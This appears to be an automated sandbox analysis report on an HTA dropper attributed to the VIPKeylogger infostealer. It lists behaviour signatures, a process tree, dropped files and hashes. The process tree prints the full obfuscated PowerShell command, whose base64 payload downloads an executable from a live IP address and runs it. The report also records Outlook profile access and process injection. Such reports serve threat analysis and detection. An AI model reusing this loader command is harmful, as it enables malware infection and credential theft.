Analysis

  • max time kernel
    135s
  • max time network
    136s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250129-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250129-enlocale:en-usos:windows10-2004-x64system
  • submitted
    31-01-2025 07:02

General

  • Target

    weseethebestthingsevermadewithbestwithnewthingsgoodforme.hta

  • Size

    15KB

  • MD5

    933a3a73fc916b5969b456590f07639a

  • SHA1

    8d89004f709477415b2eaff08dd8ff569013973e

  • SHA256

    293e90ffa49e0d1a87813aeb2e071f47cce01b4e3772598ddb84f71963ad2806

  • SHA512

    b7901179ddf0a2051a284b0522f3e49a6af378675a11e78c546c016c350714a6b37ef5e51cec6ce9af1204999cc394937797627f7da7d0dbb5e63e51b66ac01a

  • SSDEEP

    48:3rN3QGu3nsQbP2wi+pgE71lW7L0v3LfPG:533u3pbP5iWgEHWS3j+

Malware Config

Extracted

Family

vipkeylogger

Credentials

Signatures

  • VIPKeylogger

    VIPKeylogger is a keylogger and infostealer written in C# and it resembles SnakeKeylogger that was found in 2020.

  • Vipkeylogger family
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file 1 IoCs
  • Evasion via Device Credential Deployment 2 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of SetThreadContext 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SendNotifyMessage 2 IoCs
  • Suspicious use of WriteProcessMemory 19 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\weseethebestthingsevermadewithbestwithnewthingsgoodforme.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:4984
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" "/C powersHEll.eXE -Ex BYPASs -noP -w 1 -c dEViCeCredENtiAldePloYmenT.exe ; iNVOke-expresSioN($(inVoKE-eXPrEsSion('[system.TexT.enCoDInG]'+[ChaR]0x3A+[ChAr]58+'UtF8.GetStRIng([sYSTEm.coNvERT]'+[chAr]0x3A+[ChaR]0X3a+'FROMbaSe64stRinG('+[CHaR]0X22+'JDM1ZVNBYiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkZC10WXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRU1CZXJkRUZJbml0aW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUkxtT24uZGxMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkTXEsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEdmc01LZllwWE8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFhtQXBrY0RQVyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1mbmV6QixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZ0FtQ0lUeWlrcyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUnZuVSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTUGFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBoVktyUk9BTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQzNWVTQWI6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NC44MC4yMzAvMjM1L3N1d2NlLmV4ZSIsIiRFbnY6QVBQREFUQVxzdXdjZS5leGUiLDAsMCk7c1RBUlQtc2xlRVAoMyk7SU5WT0tlLUVYUFJlU1Npb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVxzdXdjZS5leGUi'+[CHaR]0x22+'))')))"
      2⤵
      • Evasion via Device Credential Deployment
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:832
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powersHEll.eXE -Ex BYPASs -noP -w 1 -c dEViCeCredENtiAldePloYmenT.exe ; iNVOke-expresSioN($(inVoKE-eXPrEsSion('[system.TexT.enCoDInG]'+[ChaR]0x3A+[ChAr]58+'UtF8.GetStRIng([sYSTEm.coNvERT]'+[chAr]0x3A+[ChaR]0X3a+'FROMbaSe64stRinG('+[CHaR]0X22+'JDM1ZVNBYiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkZC10WXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRU1CZXJkRUZJbml0aW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUkxtT24uZGxMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkTXEsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEdmc01LZllwWE8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFhtQXBrY0RQVyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1mbmV6QixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZ0FtQ0lUeWlrcyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUnZuVSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTUGFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBoVktyUk9BTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQzNWVTQWI6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NC44MC4yMzAvMjM1L3N1d2NlLmV4ZSIsIiRFbnY6QVBQREFUQVxzdXdjZS5leGUiLDAsMCk7c1RBUlQtc2xlRVAoMyk7SU5WT0tlLUVYUFJlU1Npb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVxzdXdjZS5leGUi'+[CHaR]0x22+'))')))"
        3⤵
        • Blocklisted process makes network request
        • Downloads MZ/PE file
        • Evasion via Device Credential Deployment
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1696
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xrhtenom\xrhtenom.cmdline"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:868
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
            C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8A6.tmp" "c:\Users\Admin\AppData\Local\Temp\xrhtenom\CSC7E0DEA24DEC14069921919E74924455.TMP"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:2220
        • C:\Users\Admin\AppData\Roaming\suwce.exe
          "C:\Users\Admin\AppData\Roaming\suwce.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SendNotifyMessage
          • Suspicious use of WriteProcessMemory
          PID:3136
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
            "C:\Users\Admin\AppData\Roaming\suwce.exe"
            5⤵
            • Accesses Microsoft Outlook profiles
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • outlook_office_path
            • outlook_win_path
            PID:4156

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\RES8A6.tmp

    Filesize

    1KB

    MD5

    09d68b2b7044a746f2ea3e84b1f2244f

    SHA1

    64eadcf47c8fb7c045d716dbd4d9ffe48372ff55

    SHA256

    e05ea8459e9cfe2dcf8e08208648f9df175b410cd02ad667be7068431ea0f47c

    SHA512

    96bf64fb7df9d813d70a7110f58b4ea6176cac14be1dc746d989c5b35abb2ca2c3b35801a4495314da48fdc6708f44491626a1185728cadee5bda49dc44f7474

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ggcralhp.sdx.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Local\Temp\xrhtenom\xrhtenom.dll

    Filesize

    3KB

    MD5

    5327621c3874a50655efd927e54d2737

    SHA1

    2d0a02bf319d0bd60d4402acbc254df86d8844de

    SHA256

    8b1484cdaf6f3bb5295f6360a0372feb381bf01015c55e5475dd4a507c770406

    SHA512

    847259c3a19ce29b876692fffe110f4209425dd03fd68d43526fc5b22dd5227488e5497094b91a310b6760e50bff648a2964c30d1f5fcbece482e7f87b53bcae

  • C:\Users\Admin\AppData\Roaming\suwce.exe

    Filesize

    993KB

    MD5

    bec536220cd7d3a6e449502f08273664

    SHA1

    b102bbdefeabc2ec9c84e9fdea7afce6cacf7470

    SHA256

    471fa9a125c98decd00e727886e5ddf15da64cb1456d29b15c344c4239872167

    SHA512

    81da4936c04671a6515e59ff8c779c6e8ca68ae9e882a3ef0275784fcd95ac231e18ab5add00c12967511f4a0247037cba76588cc8bff0fceab3b13f118301c4

  • \??\c:\Users\Admin\AppData\Local\Temp\xrhtenom\CSC7E0DEA24DEC14069921919E74924455.TMP

    Filesize

    652B

    MD5

    ee2513e1d3fc4a1ab338b3757b61a8d3

    SHA1

    1e08d7f7d1fdb975e31043ced9c39cd2e134e2cc

    SHA256

    a18a0be9b04fdbe24a116dbe613d2f798c6dddb585858e4a6610f16b08a06599

    SHA512

    14b8249dfa1c8d21ef5e595b79618fc5fc0934313a5ce315baa7cb0e68c27e9d3de047effd5ed20163a8cb7560b62d5feb2a6f2e4cf884046a43d653d3f8ec6a

  • \??\c:\Users\Admin\AppData\Local\Temp\xrhtenom\xrhtenom.0.cs

    Filesize

    493B

    MD5

    0590d85aef00ec7aa3ddaa98b975a41e

    SHA1

    ba8668bc1a99dd42b4b4f4e16f762b40ab4f1917

    SHA256

    a1b294d2c2f9fa6137935ec5800c37f5044714396a39a4377eaa07f1827f6da0

    SHA512

    2e8c18dbf6a85c762c0c36417070c17d5f15442a4471147751311cdb05a7393e363d151dec66028d8de17a3a7853b87f00c61dfdd7f7171e9bd4d6ec50720687

  • \??\c:\Users\Admin\AppData\Local\Temp\xrhtenom\xrhtenom.cmdline

    Filesize

    369B

    MD5

    275ba11363041e34641ea643e186be11

    SHA1

    c83fcac728edc8b460c05af573f263d566faf22a

    SHA256

    a85cb6c5be462840a46179100e7691da0ff8474c9f7d43619076541ca7669d9d

    SHA512

    b89cec43ac721f8363520fa848d187f6b4c17909bc849e6ddd1cfb6fbb44401f28e54b961ba48b27b5ac1fbe805b7c06ff6610c5b7ade6aed9261dae9c7f39f4

  • memory/1696-19-0x0000000006740000-0x000000000678C000-memory.dmp

    Filesize

    304KB

  • memory/1696-43-0x0000000007B50000-0x0000000007B64000-memory.dmp

    Filesize

    80KB

  • memory/1696-17-0x0000000006110000-0x0000000006464000-memory.dmp

    Filesize

    3.3MB

  • memory/1696-18-0x00000000065E0000-0x00000000065FE000-memory.dmp

    Filesize

    120KB

  • memory/1696-0-0x0000000070ABE000-0x0000000070ABF000-memory.dmp

    Filesize

    4KB

  • memory/1696-20-0x0000000007780000-0x00000000077B2000-memory.dmp

    Filesize

    200KB

  • memory/1696-22-0x0000000070AB0000-0x0000000071260000-memory.dmp

    Filesize

    7.7MB

  • memory/1696-23-0x000000006D4D0000-0x000000006D824000-memory.dmp

    Filesize

    3.3MB

  • memory/1696-33-0x0000000006BB0000-0x0000000006BCE000-memory.dmp

    Filesize

    120KB

  • memory/1696-21-0x000000006D370000-0x000000006D3BC000-memory.dmp

    Filesize

    304KB

  • memory/1696-34-0x0000000007880000-0x0000000007923000-memory.dmp

    Filesize

    652KB

  • memory/1696-35-0x0000000070AB0000-0x0000000071260000-memory.dmp

    Filesize

    7.7MB

  • memory/1696-36-0x0000000070AB0000-0x0000000071260000-memory.dmp

    Filesize

    7.7MB

  • memory/1696-37-0x0000000007FB0000-0x000000000862A000-memory.dmp

    Filesize

    6.5MB

  • memory/1696-38-0x0000000007930000-0x000000000794A000-memory.dmp

    Filesize

    104KB

  • memory/1696-39-0x0000000007990000-0x000000000799A000-memory.dmp

    Filesize

    40KB

  • memory/1696-40-0x0000000007BB0000-0x0000000007C46000-memory.dmp

    Filesize

    600KB

  • memory/1696-41-0x0000000007B10000-0x0000000007B21000-memory.dmp

    Filesize

    68KB

  • memory/1696-42-0x0000000007B40000-0x0000000007B4E000-memory.dmp

    Filesize

    56KB

  • memory/1696-7-0x0000000005FA0000-0x0000000006006000-memory.dmp

    Filesize

    408KB

  • memory/1696-44-0x0000000007B90000-0x0000000007BAA000-memory.dmp

    Filesize

    104KB

  • memory/1696-45-0x0000000007B80000-0x0000000007B88000-memory.dmp

    Filesize

    32KB

  • memory/1696-6-0x0000000005F30000-0x0000000005F96000-memory.dmp

    Filesize

    408KB

  • memory/1696-5-0x0000000070AB0000-0x0000000071260000-memory.dmp

    Filesize

    7.7MB

  • memory/1696-4-0x0000000005680000-0x00000000056A2000-memory.dmp

    Filesize

    136KB

  • memory/1696-3-0x0000000070AB0000-0x0000000071260000-memory.dmp

    Filesize

    7.7MB

  • memory/1696-2-0x0000000005790000-0x0000000005DB8000-memory.dmp

    Filesize

    6.2MB

  • memory/1696-58-0x0000000007B80000-0x0000000007B88000-memory.dmp

    Filesize

    32KB

  • memory/1696-64-0x0000000070ABE000-0x0000000070ABF000-memory.dmp

    Filesize

    4KB

  • memory/1696-65-0x0000000070AB0000-0x0000000071260000-memory.dmp

    Filesize

    7.7MB

  • memory/1696-66-0x0000000070AB0000-0x0000000071260000-memory.dmp

    Filesize

    7.7MB

  • memory/1696-1-0x0000000002FE0000-0x0000000003016000-memory.dmp

    Filesize

    216KB

  • memory/1696-79-0x0000000070AB0000-0x0000000071260000-memory.dmp

    Filesize

    7.7MB

  • memory/4156-86-0x0000000000400000-0x000000000044A000-memory.dmp

    Filesize

    296KB

  • memory/4156-87-0x0000000005D90000-0x0000000006334000-memory.dmp

    Filesize

    5.6MB

  • memory/4156-88-0x00000000057E0000-0x000000000587C000-memory.dmp

    Filesize

    624KB

  • memory/4156-89-0x0000000006A90000-0x0000000006C52000-memory.dmp

    Filesize

    1.8MB

  • memory/4156-90-0x0000000006910000-0x0000000006960000-memory.dmp

    Filesize

    320KB

  • memory/4156-91-0x0000000006C60000-0x0000000006CF2000-memory.dmp

    Filesize

    584KB

  • memory/4156-92-0x0000000006A20000-0x0000000006A2A000-memory.dmp

    Filesize

    40KB